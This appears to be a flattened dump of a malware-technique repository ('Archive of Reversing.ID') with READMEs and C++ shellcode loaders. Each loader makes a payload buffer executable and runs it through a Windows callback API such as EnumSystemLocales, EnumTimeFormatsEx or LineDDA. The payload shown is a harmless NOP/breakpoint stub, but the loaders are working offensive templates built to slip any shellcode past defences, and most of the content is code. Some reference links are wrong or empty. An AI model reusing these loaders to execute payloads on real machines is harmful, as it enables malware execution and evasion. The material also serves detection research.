VirtualFree (runtime, payload_len, MEM_RELEASE); 45 | 46 | return 0; 47 | } -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemGeoID/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumSystemGeoID`. 8 | 9 | ```c++ 10 | BOOL EnumSystemGeoID (GEOCLASS GeoClass, GEOID ParentGeoId, GEO_ENUMPROC lpGeoEnumProc; 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumSystemGeoID](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemgeoid) -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemGeoID/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Abusing windows API to run shellcode as callback. 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: RtlMoveMemory 13 | - permission: VirtualProtect 14 | - execution: EnumSystemGeoID 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | int main () 21 | { 22 | void * runtime; 23 | BOOL retval; 24 | DWORD old_protect = 0; 25 | 26 | // shellcode storage in stack 27 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 28 | uint32_t payload_len = 4; 29 | 30 | // allocate memory buffer for payload as READ-WRITE (no executable) 31 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 32 | 33 | // copy payload to the buffer 34 | RtlMoveMemory (runtime, payload, payload_len); 35 | 36 | // make buffer executable (R-X) 37 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 38 | if (retval != 0) 39 | { 40 | EnumSystemGeoID (GEOCLASS_NATION, 0, (GEO_ENUMPROC) runtime); 41 | } 42 | 43 | // deallocate the space 44 | VirtualFree (runtime, payload_len, MEM_RELEASE); 45 | 46 | return 0; 47 | } -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemLanguageGroups/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumSystemLanguageGroups`. 8 | 9 | ```c++ 10 | BOOL EnumSystemLanguageGroupsA (LANGUAGEGROUP_ENUMPROCA lpLanguageGroupEnumProc, DWORD dwFlags, LONG_PTR lParam); 11 | 12 | BOOL EnumSystemLanguageGroupsW (LANGUAGEGROUP_ENUMPROCW lpLanguageGroupEnumProc, DWORD dwFlags, LONG_PTR lParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumSystemLanguageGroups](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread) -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemLocales/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumSystemLocales`. 8 | 9 | ```c++ 10 | BOOL EnumSystemLocalesA (LOCALE_ENUMPROCA lpLocaleEnumProc, DWORD dwFlags); 11 | 12 | BOOL EnumSystemLocalesW (LOCALE_ENUMPROCW lpLocaleEnumProc, DWORD dwFlags); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumSystemLocalesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesa) 18 | - [MSDN EnumSystemLocalesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemLocales/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Abusing windows API to run shellcode as callback. 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: RtlMoveMemory 13 | - permission: VirtualProtect 14 | - execution: EnumSystemLocales 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | int main () 21 | { 22 | void * runtime; 23 | BOOL retval; 24 | DWORD old_protect = 0; 25 | 26 | // shellcode storage in stack 27 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 28 | uint32_t payload_len = 4; 29 | 30 | // allocate memory buffer for payload as READ-WRITE (no executable) 31 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 32 | 33 | // copy payload to the buffer 34 | RtlMoveMemory (runtime, payload, payload_len); 35 | 36 | // make buffer executable (R-X) 37 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 38 | if (retval != 0) 39 | { 40 | EnumSystemLocales ((LOCALE_ENUMPROCA)runtime, 0); 41 | } 42 | 43 | // deallocate the space 44 | VirtualFree (runtime, payload_len, MEM_RELEASE); 45 | 46 | return 0; 47 | } -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemLocalesEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumSystemLocalesEx`. 8 | 9 | ```c++ 10 | BOOL EnumSystemLocalesEx (LOCALE_ENUMPROCEX lpLocaleEnumProcEx, DWORD dwFlags, LPARAM lParam, LPVOID lpReserved); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumSystemLocalesEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesex) -------------------------------------------------------------------------------- /windows/execution/callback/EnumSystemLocalesEx/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Abusing windows API to run shellcode as callback. 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: RtlMoveMemory 13 | - permission: VirtualProtect 14 | - execution: EnumSystemLocalesEx 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | int main () 21 | { 22 | void * runtime; 23 | BOOL retval; 24 | DWORD old_protect = 0; 25 | 26 | // shellcode storage in stack 27 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 28 | uint32_t payload_len = 4; 29 | 30 | // allocate memory buffer for payload as READ-WRITE (no executable) 31 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 32 | 33 | // copy payload to the buffer 34 | RtlMoveMemory (runtime, payload, payload_len); 35 | 36 | // make buffer executable (R-X) 37 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 38 | if (retval != 0) 39 | { 40 | EnumSystemLocalesEx ((LOCALE_ENUMPROCEX)runtime, 0, 0, NULL); 41 | } 42 | 43 | // deallocate the space 44 | VirtualFree (runtime, payload_len, MEM_RELEASE); 45 | 46 | return 0; 47 | } -------------------------------------------------------------------------------- /windows/execution/callback/EnumThreadWindows/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumThreadWindows`. 8 | 9 | ```c++ 10 | BOOL EnumThreadWindows (DWORD dwThreadId, WNDENUMPROC lpfn, LPARAM lParam); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumThreadWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumthreadwindows) -------------------------------------------------------------------------------- /windows/execution/callback/EnumTimeFormats/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumTimeFormats`. 8 | 9 | ```c++ 10 | BOOL EnumTimeFormatsA (TIMEFMT_ENUMPROCA lpTimeFmtEnumProc, LCID Locale, DWORD dwFlags); 11 | 12 | BOOL EnumTimeFormatsW (TIMEFMT_ENUMPROCW lpTimeFmtEnumProc, LCID Locale, DWORD dwFlags); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumTimeFormatsA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsa) 18 | - [MSDN EnumTimeFormatsW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumTimeFormats/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Abusing windows API to run shellcode as callback. 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: RtlMoveMemory 13 | - permission: VirtualProtect 14 | - execution: EnumTimeFormats 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | int main () 21 | { 22 | void * runtime; 23 | BOOL retval; 24 | DWORD old_protect = 0; 25 | 26 | // shellcode storage in stack 27 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 28 | uint32_t payload_len = 4; 29 | 30 | // allocate memory buffer for payload as READ-WRITE (no executable) 31 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 32 | 33 | // copy payload to the buffer 34 | RtlMoveMemory (runtime, payload, payload_len); 35 | 36 | // make buffer executable (R-X) 37 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 38 | if (retval != 0) 39 | { 40 | EnumTimeFormats ((TIMEFMT_ENUMPROCA)runtime, LOCALE_SYSTEM_DEFAULT, 0); 41 | } 42 | 43 | // deallocate the space 44 | VirtualFree (runtime, payload_len, MEM_RELEASE); 45 | 46 | return 0; 47 | } -------------------------------------------------------------------------------- /windows/execution/callback/EnumTimeFormatsEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumTimeFormatsEx`. 8 | 9 | ```c++ 10 | BOOL EnumTimeFormatsEx (TIMEFMT_ENUMPROCEX lpTimeFmtEnumProcEx, LPCWSTR lpLocaleName, DWORD dwFlags, LPARAM lParam); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumTimeFormatsEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsex) -------------------------------------------------------------------------------- /windows/execution/callback/EnumTimeFormatsEx/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Abusing windows API to run shellcode as callback. 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: RtlMoveMemory 13 | - permission: VirtualProtect 14 | - execution: EnumTimeFormatsEx 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | int main () 21 | { 22 | void * runtime; 23 | BOOL retval; 24 | DWORD old_protect = 0; 25 | 26 | // shellcode storage in stack 27 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 28 | uint32_t payload_len = 4; 29 | 30 | // allocate memory buffer for payload as READ-WRITE (no executable) 31 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 32 | 33 | // copy payload to the buffer 34 | RtlMoveMemory (runtime, payload, payload_len); 35 | 36 | // make buffer executable (R-X) 37 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 38 | if (retval != 0) 39 | { 40 | EnumTimeFormatsEx ((TIMEFMT_ENUMPROCEX)runtime, NULL, 0, 0); 41 | } 42 | 43 | // deallocate the space 44 | VirtualFree (runtime, payload_len, MEM_RELEASE); 45 | 46 | return 0; 47 | } -------------------------------------------------------------------------------- /windows/execution/callback/EnumUILanguages/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumUILanguages`. 8 | 9 | ```c++ 10 | BOOL EnumUILanguagesA (UILANGUAGE_ENUMPROCA lpUILanguageEnumProc, DWORD dwFlags, LONG_PTR lParam); 11 | 12 | BOOL EnumUILanguagesW (UILANGUAGE_ENUMPROCW lpUILanguageEnumProc, DWORD dwFlags, LONG_PTR lParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumUILanguagesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumuilanguagesa) 18 | - [MSDN EnumUILanguagesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumuilanguagesw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumUILanguages/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Abusing windows API to run shellcode as callback. 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: RtlMoveMemory 13 | - permission: VirtualProtect 14 | - execution: EnumUILanguages 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | int main () 21 | { 22 | void * runtime; 23 | BOOL retval; 24 | DWORD old_protect = 0; 25 | 26 | // shellcode storage in stack 27 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 28 | uint32_t payload_len = 4; 29 | 30 | // allocate memory buffer for payload as READ-WRITE (no executable) 31 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 32 | 33 | // copy payload to the buffer 34 | RtlMoveMemory (runtime, payload, payload_len); 35 | 36 | // make buffer executable (R-X) 37 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 38 | if (retval != 0) 39 | { 40 | EnumUILanguages ((UILANGUAGE_ENUMPROCA)runtime, MUI_LANGUAGE_ID, 0); 41 | } 42 | 43 | // deallocate the space 44 | VirtualFree (runtime, payload_len, MEM_RELEASE); 45 | 46 | return 0; 47 | } -------------------------------------------------------------------------------- /windows/execution/callback/EnumWindowStations/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumWindowStations`. 8 | 9 | ```c++ 10 | BOOL EnumWindowStationsA (WINSTAENUMPROCA lpEnumFunc, LPARAM lParam); 11 | 12 | BOOL EnumWindowStationsW (WINSTAENUMPROCW lpEnumFunc, LPARAM lParam); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN EnumWindowStationsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindowstationsa) 18 | - [MSDN EnumWindowStationsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindowstationsw) -------------------------------------------------------------------------------- /windows/execution/callback/EnumWindows/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumWindows`. 8 | 9 | ```c++ 10 | BOOL EnumWindows (WNDENUMPROC lpEnumFunc, LPARAM lParam); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindows) -------------------------------------------------------------------------------- /windows/execution/callback/EnumerateLoadedModules/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumerateLoadedModules`. 8 | 9 | ```c++ 10 | BOOL EnumerateLoadedModules (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK EnumLoadedModulesCallback, PVOID UserContext); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN EnumerateLoadedModules](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodules) -------------------------------------------------------------------------------- /windows/execution/callback/EnumerateLoadedModulesEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EnumerateLoadedModulesEx`. 8 | 9 | ```c++ 10 | BOOL EnumerateLoadedModulesEx (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback, PVOIDUserContext); 11 | 12 | BOOL EnumerateLoadedModulesExW (HANDLEhProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext); 13 | 14 | BOOL EnumerateLoadedModules64 (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback, PVOIDUserContext); 15 | 16 | BOOL EnumerateLoadedModulesW64 (HANDLEhProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [MSDN EnumerateLoadedModulesEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesex) 22 | - [MSDN EnumerateLoadedModulesExW](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesexw) 23 | - [MSDN EnumerateLoadedModules64](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodules64) 24 | - [MSDN EnumerateLoadedModulesW64](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesw64) -------------------------------------------------------------------------------- /windows/execution/callback/FindDebugInfoFileEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `FindDebugInfoFileEx`. 8 | 9 | ```c++ 10 | HANDLE FindDebugInfoFileEx (PCSTR FileName, PCSTR SymbolPath, PSTR DebugFilePath, PFIND_DEBUG_FILE_CALLBACK Callback, PVOID CallerData); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN FindDebugInfoFileEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-finddebuginfofileex) -------------------------------------------------------------------------------- /windows/execution/callback/FindExecutableImageEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `FindExecutableImageEx`. 8 | 9 | ```c++ 10 | HANDLE FindExecutableImageEx (PCSTR FileName, PCSTR SymbolPath, PSTR ImageFilePath, PFIND_EXE_FILE_CALLBACK Callback, PVOID CallerData); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN FindExecutableImageEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-findexecutableimageex) -------------------------------------------------------------------------------- /windows/execution/callback/GetOpenFileName/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `GetOpenFileName`. 8 | 9 | ```c++ 10 | BOOL GetOpenFileNameA (LPOPENFILENAMEA param); 11 | 12 | BOOL GetOpenFileNameW (LPOPENFILENAMEW param); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN GetOpenFileNameA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getopenfilenamea) 18 | - [MSDN GetOpenFileNameW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getopenfilenamew) 19 | - [MSDN structure OPENFILENAMEA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamea) 20 | - [MSDN structure OPENFILENAMEW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamew) -------------------------------------------------------------------------------- /windows/execution/callback/GetSaveFileName/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `GetSaveFileName`. 8 | 9 | ```c++ 10 | BOOL GetSaveFileNameA (LPOPENFILENAMEA param); 11 | 12 | BOOL GetSaveFileNameW (LPOPENFILENAMEW param); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN GetSaveFileNameA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getsavefilenamea) 18 | - [MSDN GetSaveFileNameW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/nf-commdlg-getsavefilenamew) 19 | - [MSDN structure OPENFILENAMEA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamea) 20 | - [MSDN structure OPENFILENAMEW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-openfilenamew) -------------------------------------------------------------------------------- /windows/execution/callback/GrayString/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `GrayString`. 8 | 9 | ```c++ 10 | BOOL GrayStringA (HDC hDC, HBRUSH hBrush, GRAYSTRINGPROC lpOutputFunc, LPARAM lpData, int nCount, int X, int Y, int nWidth, int nHeight); 11 | 12 | BOOL GrayStringW (HDC hDC, HBRUSH hBrush, GRAYSTRINGPROC lpOutputFunc, LPARAM lpData, int nCount, int X, int Y, int nWidth, int nHeight); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN GrayStringA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-graystringa) 18 | - [MSDN GrayStringW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-graystringw) -------------------------------------------------------------------------------- /windows/execution/callback/ImageGetDigestStream/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `ImageGetDigestStream`. 8 | 9 | ```c++ 10 | BOOL IMAGEAPI ImageGetDigestStream (HANDLE FileHandle, DWORD DigestLevel, DIGEST_FUNCTION DigestFunction, DIGEST_HANDLE DigestHandle); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN ImageGetDigestStream](https://docs.microsoft.com/en-us/windows/win32/api/imagehlp/nf-imagehlp-imagegetdigeststream) -------------------------------------------------------------------------------- /windows/execution/callback/ImmEnumInputContext/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `ImmEnumInputContext`. 8 | 9 | ```c++ 10 | BOOL ImmEnumInputContext (DWORD idThread, IMCENUMPROC lpfn, LPARAM lParam); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN ImmEnumInputContext](https://docs.microsoft.com/en-us/windows/win32/api/imm/nf-imm-immenuminputcontext) -------------------------------------------------------------------------------- /windows/execution/callback/InitOnceExecuteOnce/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `InitOnceExecuteOnce`. 8 | 9 | ```c++ 10 | BOOL InitOnceExecuteOnce (PINIT_ONCE InitOnce, PINIT_ONCE_FN InitFn, PVOID Parameter, LPVOID *Context); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN InitOnceExecuteOnce](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-initonceexecuteonce) -------------------------------------------------------------------------------- /windows/execution/callback/LdrEnumerateLoadedModules/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `LdrEnumerateLoadedModules`. 8 | 9 | `LdrEnumerateLoadedModules` adalah fungsi internal dan bersifat low-level 10 | 11 | ```c++ 12 | NTSTATUS LdrEnumerateLoadedModules (BOOL ReservedFlag, LDR_ENUM_CALLBACK EnumProc, PVOID context); 13 | ``` 14 | 15 | ### Reference 16 | 17 | -------------------------------------------------------------------------------- /windows/execution/callback/LdrpCallInitRoutine/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `LdrpCallInitRoutine`. 8 | 9 | `LdrpCallInitRoutine` adalah fungsi internal dan bersifat low-level 10 | 11 | ```c++ 12 | char LdrpCallInitRoutine (LpCallInitRoutine callback, size_t, unsigned int, size_t) 13 | ``` 14 | 15 | ### Reference 16 | 17 | -------------------------------------------------------------------------------- /windows/execution/callback/LineDDA/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `LineDDA`. 8 | 9 | ```c++ 10 | BOOL LineDDA(int xStart, int yStart, int xEnd, int yEnd, LINEDDAPROC lpProc, LPARAM data); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN LineDDA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-linedda) -------------------------------------------------------------------------------- /windows/execution/callback/LineDDA/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Abusing windows API to run shellcode as callback. 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: RtlMoveMemory 13 | - permission: VirtualProtect 14 | - execution: LineDDA 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | #pragma comment(lib,"gdi32") 21 | 22 | int main () 23 | { 24 | void * runtime; 25 | BOOL retval; 26 | DWORD old_protect = 0; 27 | 28 | // shellcode storage in stack 29 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 30 | uint32_t payload_len = 4; 31 | 32 | // allocate memory buffer for payload as READ-WRITE (no executable) 33 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 34 | 35 | // copy payload to the buffer 36 | RtlMoveMemory (runtime, payload, payload_len); 37 | 38 | // make buffer executable (R-X) 39 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 40 | if (retval != 0) 41 | { 42 | LineDDA (10, 11, 12, 13, (LINEDDAPROC)runtime, 0); 43 | } 44 | 45 | // deallocate the space 46 | VirtualFree (runtime, payload_len, MEM_RELEASE); 47 | 48 | return 0; 49 | } -------------------------------------------------------------------------------- /windows/execution/callback/MappingRecognizeText/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `MappingRecognizeText`. 8 | 9 | ```c++ 10 | HRESULT MappingRecognizeText (PMAPPING_SERVICE_INFO pServiceInfo, LPCWSTR pszText, DWORD dwLength, DWORD dwIndex, PMAPPING_OPTIONS pOptions, PMAPPING_PROPERTY_BAG pbag); 11 | 12 | HRESULT MappingGetServices (PMAPPING_ENUM_OPTIONS pOptions, PMAPPING_SERVICE_INFO *prgServices, DWORD *pdwServicesCount); 13 | 14 | HRESULT MappingFreeServices (PMAPPING_SERVICE_INFO pServiceInfo); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN MappingRecognizeText](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappingrecognizetext) 20 | - [MSDN MappingGetServices](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappinggetservices) 21 | - [MSDN MappingFreeServices](https://docs.microsoft.com/en-us/windows/win32/api/elscore/nf-elscore-mappingfreeservices) 22 | - [MSDN structure MAPPING_OPTIONS](https://docs.microsoft.com/en-us/windows/win32/api/elscore/ns-elscore-mapping_options) -------------------------------------------------------------------------------- /windows/execution/callback/NotifyIpInterfaceChange/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `NotifyIpInterfaceChange`. 8 | 9 | Fungsi ini tersedia untuk Windows Vista dan versi selanjutnya. 10 | 11 | ```c++ 12 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API 13 | NotifyIpInterfaceChange (ADDRESS_FAMILY Family, PIPINTERFACE_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle); 14 | ``` 15 | 16 | ### Reference 17 | 18 | - [MSDN NotifyIpInterfaceChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyipinterfacechange) -------------------------------------------------------------------------------- 